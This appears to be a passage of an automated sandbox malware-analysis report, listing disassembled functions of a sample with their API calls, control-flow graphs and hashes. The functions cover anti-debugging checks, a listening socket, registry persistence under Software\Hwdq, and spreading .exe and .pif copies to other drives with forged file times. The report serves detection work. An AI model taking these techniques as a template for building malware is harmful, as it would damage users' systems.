                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Internet$CloseFileHandle$CountOpenTick$CreateReadWritelstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 999627789-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9bf43442b79ff3ce27d79f8a7868df03e107b76bb8ba04bdd306eb52faefd071
                                                                                                                                                                                                                                                                                            • Instruction ID: da65a1481fa096ad994fbeb36cf570ab20f7b3db976b0c0053026542da32a71b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9bf43442b79ff3ce27d79f8a7868df03e107b76bb8ba04bdd306eb52faefd071
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76514E71900658ABEB34CF58CC48BEBB774AB44306F0045D9E309A72A0DBB45BD5CF95
                                                                                                                                                                                                                                                                                            Function 014383C9 Relevance: 12.1, APIs: 8, Instructions: 83networkthreadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 014383EA
                                                                                                                                                                                                                                                                                            • htons.WS2_32(00000EC9), ref: 0143840B
                                                                                                                                                                                                                                                                                            • bind.WS2_32(000000FF,00000002,00000010), ref: 0143842C
                                                                                                                                                                                                                                                                                            • closesocket.WS2_32(00000000), ref: 014384A3
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 014384AB
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ExitThreadUserbindclosesockethtonssocket
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3582385377-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 90d2c3843484f1980cd518a7f4ae27f2f416b35310876347873d957d7499148a
                                                                                                                                                                                                                                                                                            • Instruction ID: 95e159e06693e5c8260e6f68b753afd5ca412a960e6d155e62d4fa1288c70145
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90d2c3843484f1980cd518a7f4ae27f2f416b35310876347873d957d7499148a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97313474A00306EBDB20DFF49909BAEFA74AB9C710F14472EF715A66E0E6744601CB55
                                                                                                                                                                                                                                                                                            Function 00AB130D Relevance: 6.1, APIs: 4, Instructions: 123sleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CheckRemoteDebuggerPresent.KERNEL32(00000009,?), ref: 00AB13E5
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 00AB1409
                                                                                                                                                                                                                                                                                            • EnumWindows.USER32(00AB1081,00000000), ref: 00AB144A
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00AB1468
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1707888832.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000AB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1710967277.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712196083.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Sleep$CheckDebuggerEnumPresentRemoteWindows
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 13200330-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 63a4e7c00cc56fce5944bb0ea1f1357f4660c7e8664a70e2c98d3443b44d5ba4
                                                                                                                                                                                                                                                                                            • Instruction ID: 48c174c575f236f60619d9928181fa13ff5184a0d0bf6ed09e98052310ea4a9c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 63a4e7c00cc56fce5944bb0ea1f1357f4660c7e8664a70e2c98d3443b44d5ba4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 903198B1C05308AEEF14AFE0DA56AEDBBBCEF40314FA00559E411AA183DB355B81CB54
                                                                                                                                                                                                                                                                                            Function 00AB58EB Relevance: 3.0, APIs: 2, Instructions: 49processCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000018,?,00000000,00000001), ref: 00AB590B
                                                                                                                                                                                                                                                                                            • Module32FirstW.KERNEL32(00000000,?), ref: 00AB5951
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1707888832.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000AB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1710967277.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712196083.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 1db3b405ea79af3646c1d27bc8d4350b12789e9677a9c1ea50c85ef15eeb3989
                                                                                                                                                                                                                                                                                            • Instruction ID: 62954497601059d090d95f33bdd3f07e4b9c572a7f66f4e11c5d04b4cec244cb
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1db3b405ea79af3646c1d27bc8d4350b12789e9677a9c1ea50c85ef15eeb3989
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6F04972A02624B9EA5067746C86FEE339C8B05330FA0014AF665AB0C3DD209A845AB4
                                                                                                                                                                                                                                                                                            Function 00AB6111 Relevance: 1.3, APIs: 1, Instructions: 68sleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1707888832.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000AB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1710967277.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712196083.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 622435efe4e8f8acd0a7fa5d890bdd82c32cdda1048d5db10fb3163eee9e2296
                                                                                                                                                                                                                                                                                            • Instruction ID: 9803f699861662bfcbd94db845c5a64749ba8fa4ba07e3a7f333980791510649
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 622435efe4e8f8acd0a7fa5d890bdd82c32cdda1048d5db10fb3163eee9e2296
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4411E2B3A005154BEB1CDF65AC5AD76B392EBE4354317412EE5269B292CAB06943C7C0
                                                                                                                                                                                                                                                                                            Function 01443062 Relevance: 75.7, APIs: 39, Strings: 4, Instructions: 428sleepfiletimeCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 613 1443062-1443188 call 1448060 call 14344cb Sleep call 1442fff 620 144318b-14431a5 call 143e329 613->620 623 14431b4-14431be 620->623 624 14431a7-14431b2 Sleep 620->624 625 1443744-1443777 RtlExitUserThread 623->625 626 14431c4-14431ce 623->626 624->620 626->625 628 14431d4-14431e0 626->628 628->625 629 14431e6-14431f3 628->629 629->625 630 14431f9-1443200 629->630 630->625 631 1443206-144324e call 1442ebc Sleep GetLogicalDrives 630->631 635 1443734-144373f Sleep 631->635 636 1443254-1443272 631->636 635->630 637 144372f 636->637 638 1443278-14432b6 GetDriveTypeA 636->638 637->635 638->637 639 14432bc-14432f9 lstrcat CreateFileA 638->639 640 1443522-144353c GetFileAttributesA 639->640 641 14432ff-1443337 GetFileTime FileTimeToSystemTime 639->641 644 144353e-1443566 SetFileAttributesA DeleteFileA call 143a2ad 640->644 645 1443569-1443592 CreateFileA 640->645 642 1443515-144351c CloseHandle 641->642 643 144333d-1443359 641->643 642->640 643->642 647 144335f-14433b4 call 1434060 ReadFile CharLowerA lstrlen 643->647 644->645 645->637 646 1443598-144361d GetSystemTime SystemTimeToFileTime call 143a16b call 14344cb 645->646 659 1443633-144363f lstrcat 646->659 660 144361f-1443631 lstrcat 646->660 655 1443510 647->655 656 14433ba-14433d7 call 1438deb 647->656 655->642 656->655 663 14433dd-14433f0 656->663 662 1443645-14436ed call 1442b8e lstrlen WriteFile SetFileTime CloseHandle SetFileAttributesA CreateFileA 659->662 660->662 662->637 670 14436ef-1443729 WriteFile CloseHandle SetFileAttributesA 662->670 663->655 666 14433f6-14433ff 663->666 668 1443405-1443417 666->668 669 144350b 666->669 671 1443422-1443425 668->671 672 1443419-144341f 668->672 669->655 670->637 673 144342b-1443437 671->673 672->671 674 1443465-144348f lstrcpy GetFileAttributesA 673->674 675 1443439-1443445 673->675 676 1443491-14434c7 CloseHandle CreateFileA 674->676 677 1443509 674->677 675->674 678 1443447-1443452 675->678 676->677 679 14434c9-1443503 WriteFile CloseHandle SetFileAttributesA 676->679 677->655 678->674 680 1443454-1443463 678->680 679->677 680->673
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 014344CB: InterlockedExchange.KERNEL32(014490C0,?), ref: 014344E9
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32 ref: 01443176
                                                                                                                                                                                                                                                                                              • Part of subcall function 01442FFF: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0144302B
                                                                                                                                                                                                                                                                                              • Part of subcall function 01442FFF: WriteFile.KERNEL32(000000FF,014126B0,00000401,00000000,00000000), ref: 0144304E
                                                                                                                                                                                                                                                                                              • Part of subcall function 01442FFF: CloseHandle.KERNEL32(000000FF), ref: 01443058
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00004E20), ref: 014431AC
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00004E20), ref: 01443210
                                                                                                                                                                                                                                                                                            • GetLogicalDrives.KERNEL32 ref: 01443220
                                                                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 014432A3
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,01432740), ref: 014432CA
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 014432E6
                                                                                                                                                                                                                                                                                            • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 0144331B
                                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0144332F
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00000FA0,?,00000000), ref: 01443391
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$SleepTime$Create$CloseDriveDrivesExchangeHandleInterlockedLogicalReadSystemTypeWritelstrcat
                                                                                                                                                                                                                                                                                            • String ID: .exe$.pif$:$\
                                                                                                                                                                                                                                                                                            • API String ID: 2892063643-4138429844
                                                                                                                                                                                                                                                                                            • Opcode ID: 5f207cc4a8cf9ae37a751f76d25b93cee4ff79ee5640322015a40a45b27ea234
                                                                                                                                                                                                                                                                                            • Instruction ID: eb94ed736681641e991c47ef4a072695018d8f8333a7afd0c719d37e20decaa3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f207cc4a8cf9ae37a751f76d25b93cee4ff79ee5640322015a40a45b27ea234
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D902A1B5D002689BEB34DF64CC88BEABB75BF49B00F0081D9E349E6294D7749A94CF50
                                                                                                                                                                                                                                                                                            Function 01442514 Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 153stringsynchronizationprocessCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01442545
                                                                                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 01442584
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,00000002,00000000), ref: 014425A5
                                                                                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000000,?,00000040), ref: 014425C0
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,?), ref: 014425D6
                                                                                                                                                                                                                                                                                            • CharLowerA.USER32(00000000), ref: 014425E3
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 014425FC
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 0144260A
                                                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0144261E
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0144262A
                                                                                                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(?), ref: 0144263D
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0144264A
                                                                                                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 0144267D
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,00000000,00000128,00000002,00000000), ref: 0144269E
                                                                                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000000,?,00000040), ref: 014426B9
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,?), ref: 014426CF
                                                                                                                                                                                                                                                                                            • CharLowerA.USER32(00000000), ref: 014426DC
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 014426F5
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01442703
                                                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 01442717
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 01442723
                                                                                                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(?), ref: 01442736
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 01442743
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 01442774
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Mutexlstrlen$CloseCreateHandle$CharErrorLastLowerProcess32Releaselstrcpylstrcpynwsprintf$FirstNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                            • String ID: M_%d_$M_%d_
                                                                                                                                                                                                                                                                                            • API String ID: 3105503624-485321427
                                                                                                                                                                                                                                                                                            • Opcode ID: 0c03f681cb0eb1a651620c69c1b3fee3ae2370932665380d98481b17149f6d66
                                                                                                                                                                                                                                                                                            • Instruction ID: 05becb6e03bcb85b771cb2b5dcc44d5a100de560ebef21816287279c395e6533
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c03f681cb0eb1a651620c69c1b3fee3ae2370932665380d98481b17149f6d66
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3512EB5900218ABEB30DBB4EC88FDAB778AB68701F1045D9E749A6154DBB49BC4CF50
                                                                                                                                                                                                                                                                                            Function 01434D96 Relevance: 37.1, APIs: 18, Strings: 3, Instructions: 395registrystringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 835 1434d96-1434e3a call 1448060 838 1434e41-1434eb1 lstrcpy lstrlen wsprintfA RegOpenKeyExA 835->838 839 1434e3c 835->839 841 1435112-1435134 838->841 842 1434eb7-1434ed2 RegCreateKeyA 838->842 840 1435459-1435469 839->840 847 143513a-1435163 wsprintfA 841->847 848 143529e-14352a5 841->848 844 1434ee0-1434f04 GlobalAlloc call 143c89a 842->844 845 1434ed4-1434edb 842->845 854 1434f06-1434f15 call 1436330 844->854 855 1434f1d-1434f24 844->855 845->840 852 14351a0-14351d9 RegQueryValueExA 847->852 853 1435165-1435197 RegQueryValueExA 847->853 850 14352ab-1435408 call 144772b * 5 call 1436330 848->850 851 143542a-1435431 848->851 916 1435425 850->916 917 143540a-1435423 call 144772b 850->917 859 1435433-143543a RegCloseKey 851->859 860 1435440-1435447 851->860 857 14351e0-1435202 852->857 858 14351db 852->858 861 1435199 853->861 862 143519e 853->862 869 1434f1a 854->869 864 14350f0-14350f7 855->864 865 1434f2a-1434f4c 855->865 867 1435299 857->867 868 1435208-143520e 857->868 858->857 859->860 860->840 862->857 879 1435106-143510d 864->879 880 14350f9-1435100 GlobalFree 864->880 881 1434f52-1434f96 wsprintfA 865->881 882 1435085-14350ed RegCloseKey call 144772b * 2 865->882 867->867 872 1435223-143522f 868->872 873 1435231-143523d 868->873 874 1435215-1435221 868->874 875 143523f-143524d 868->875 876 143524f-143525b 868->876 877 143525d-143527a call 14349f9 868->877 878 143527c-1435296 call 14349f9 868->878 869->855 872->867 873->867 874->867 875->867 876->867 877->867 878->867 879->840 880->879 886 1435027-143502e 881->886 887 1434f9c-1434fa2 881->887 882->864 899 1435053-143507a lstrlen RegSetValueExA 886->899 900 1435030-1435051 RegSetValueExA 886->900 887->872 887->873 887->874 887->875 887->876 887->877 887->878 892 1434fc1-1434fcb 887->892 893 1435007-1435021 call 1434a5b lstrcpy 887->893 894 1434fe5-1435005 call 1434a5b lstrcpy 887->894 895 1434fa9-1434fb3 887->895 896 1434fcd-1434fd7 887->896 897 1434fb5-1434fbf 887->897 898 1434fd9-1434fe3 887->898 892->886 893->886 894->886 895->886 896->886 897->886 898->886 904 1435080 899->904 900->904 916->851 917->851
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,Software\Hwdq), ref: 01434E54
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,\%d,616E6974), ref: 01434E78
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01434E86
                                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 01434EA9
                                                                                                                                                                                                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 01434ECA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateOpenlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                            • String ID: Software\Hwdq$\%d$userC:\Windows\
                                                                                                                                                                                                                                                                                            • API String ID: 4004410694-1901203423
